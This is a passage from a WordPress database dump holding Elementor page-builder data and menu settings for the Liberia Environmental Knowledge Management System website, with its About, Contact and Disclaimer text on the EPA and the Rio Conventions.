tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Liberia Environmental Knowledge Management System (EKMS) provides access to important data from key government institutions in Liberia on implementation of the Rio Conventions. The  information in the EKMS is provided for informational purposes only. This website contents can not be taken to reflect the views of its sponsors.\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11275,1842,'_menu_item_type','post_type'),(11276,1842,'_menu_item_menu_item_parent','129'),(11277,1842,'_menu_item_object_id','335'),(11278,1842,'_menu_item_object','page'),(11279,1842,'_menu_item_target',''),(11280,1842,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(11281,1842,'_menu_item_xfn',''),(11282,1842,'_menu_item_url',''),(11284,1842,'_menu_item_template',''),(11285,1842,'_menu_item_mega_template','0'),(11286,1842,'_menu_item_nolink',''),(11287,1842,'_menu_item_category_post',''),(11288,1842,'_menu_item_megamenu',''),(11289,1842,'_menu_item_megamenu_auto_width',''),(11290,1842,'_menu_item_megamenu_col',''),(11291,1842,'_menu_item_megamenu_heading',''),(11292,1842,'_menu_item_megamenu_widgetarea','0'),(11293,1842,'_menu_item_icon',''),(11294,1842,'_elementor_controls_usage','a:0:{}'),(11295,1843,'_menu_item_type','post_type'),(11296,1843,'_menu_item_menu_item_parent','0'),(11297,1843,'_menu_item_object_id','9'),(11298,1843,'_menu_item_object','page'),(11299,1843,'_menu_item_target',''),(11300,1843,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(11301,1843,'_menu_item_xfn',''),(11302,1843,'_menu_item_url',''),(11304,1843,'_menu_item_template',''),(11305,1843,'_menu_item_mega_template','0'),(11306,1843,'_menu_item_nolink',''),(11307,1843,'_menu_item_category_post',''),(11308,1843,'_menu_item_megamenu',''),(11309,1843,'_menu_item_megamenu_auto_width',''),(11310,1843,'_menu_item_megamenu_col',''),(11311,1843,'_menu_item_megamenu_heading',''),(11312,1843,'_menu_item_megamenu_widgetarea','0'),(11313,1843,'_menu_item_icon',''),(11314,1844,'_menu_item_type','post_type'),(11315,1844,'_menu_item_menu_item_parent','0'),(11316,1844,'_menu_item_object_id','68'),(11317,1844,'_menu_item_object','page'),(11318,1844,'_menu_item_target',''),(11319,1844,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(11320,1844,'_menu_item_xfn',''),(11321,1844,'_menu_item_url',''),(11323,1844,'_menu_item_template',''),(11324,1844,'_menu_item_mega_template','0'),(11325,1844,'_menu_item_nolink',''),(11326,1844,'_menu_item_category_post',''),(11327,1844,'_menu_item_megamenu',''),(11328,1844,'_menu_item_megamenu_auto_width',''),(11329,1844,'_menu_item_megamenu_col',''),(11330,1844,'_menu_item_megamenu_heading',''),(11331,1844,'_menu_item_megamenu_widgetarea','0'),(11332,1844,'_menu_item_icon',''),(11333,1845,'_menu_item_type','post_type'),(11334,1845,'_menu_item_menu_item_parent','0'),(11335,1845,'_menu_item_object_id','82'),(11336,1845,'_menu_item_object','page'),(11337,1845,'_menu_item_target',''),(11338,1845,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(11339,1845,'_menu_item_xfn',''),(11340,1845,'_menu_item_url',''),(11342,1845,'_menu_item_template',''),(11343,1845,'_menu_item_mega_template','0'),(11344,1845,'_menu_item_nolink',''),(11345,1845,'_menu_item_category_post',''),(11346,1845,'_menu_item_megamenu',''),(11347,1845,'_menu_item_megamenu_auto_width',''),(11348,1845,'_menu_item_megamenu_col',''),(11349,1845,'_menu_item_megamenu_heading',''),(11350,1845,'_menu_item_megamenu_widgetarea','0'),(11351,1845,'_menu_item_icon',''),(11352,1846,'_menu_item_type','post_type'),(11353,1846,'_menu_item_menu_item_parent','0'),(11354,1846,'_menu_item_object_id','80'),(11355,1846,'_menu_item_object','page'),(11356,1846,'_menu_item_target',''),(11357,1846,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(11358,1846,'_menu_item_xfn',''),(11359,1846,'_menu_item_url',''),(11361,1846,'_menu_item_template',''),(11362,1846,'_menu_item_mega_template','0'),(11363,1846,'_menu_item_nolink',''),(11364,1846,'_menu_item_category_post',''),(11365,1846,'_menu_item_megamenu',''),(11366,1846,'_menu_item_megamenu_auto_width',''),(11367,1846,'_menu_item_megamenu_col',''),(11368,1846,'_menu_item_megamenu_heading',''),(11369,1846,'_menu_item_megamenu_widgetarea','0'),(11370,1846,'_menu_item_icon',''),(11371,1843,'_elementor_controls_usage','a:0:{}'),(11372,1844,'_elementor_controls_usage','a:0:{}'),(11373,1845,'_elementor_controls_usage','a:0:{}'),(11374,1846,'_elementor_controls_usage','a:0:{}'),(11376,1847,'_elementor_edit_mode','builder'),(11377,1847,'_elementor_template_type','wp-page'),(11378,1847,'_elementor_version','2.7.5'),(11379,1847,'_wp_page_template','default'),(11380,1847,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11381,1847,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}}'),(11383,1848,'_elementor_edit_mode','builder'),(11384,1848,'_elementor_template_type','wp-page'),(11385,1848,'_elementor_version','2.7.5'),(11386,1848,'_wp_page_template','default'),(11387,1848,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Liberia Environmental Knowledge Management System (EKMS) provides access to important data from key government institutions in Liberia on implementation of the Rio Conventions. The  information in the EKMS is provided for informational purposes only. This website contents can not be taken to reflect the views of its sponsors.\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11388,1848,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:5;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:2:{s:11:\"title_color\";i:4;s:21:\"typography_typography\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:4;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:10:\"text_color\";i:4;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(11390,1849,'_elementor_edit_mode','builder'),(11391,1849,'_elementor_template_type','wp-page'),(11392,1849,'_elementor_version','2.7.5'),(11393,1849,'_wp_page_template','default'),(11394,1849,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11397,1850,'_elementor_edit_mode','builder'),(11398,1850,'_elementor_template_type','wp-page'),(11399,1850,'_elementor_version','2.7.5'),(11400,1850,'_wp_page_template','default'),(11401,1850,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11402,1850,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:5;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:2:{s:11:\"title_color\";i:4;s:21:\"typography_typography\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:4;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:10:\"text_color\";i:4;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(11404,1851,'_wp_page_template','default'),(11405,1851,'_elementor_edit_mode','builder'),(11406,1851,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center 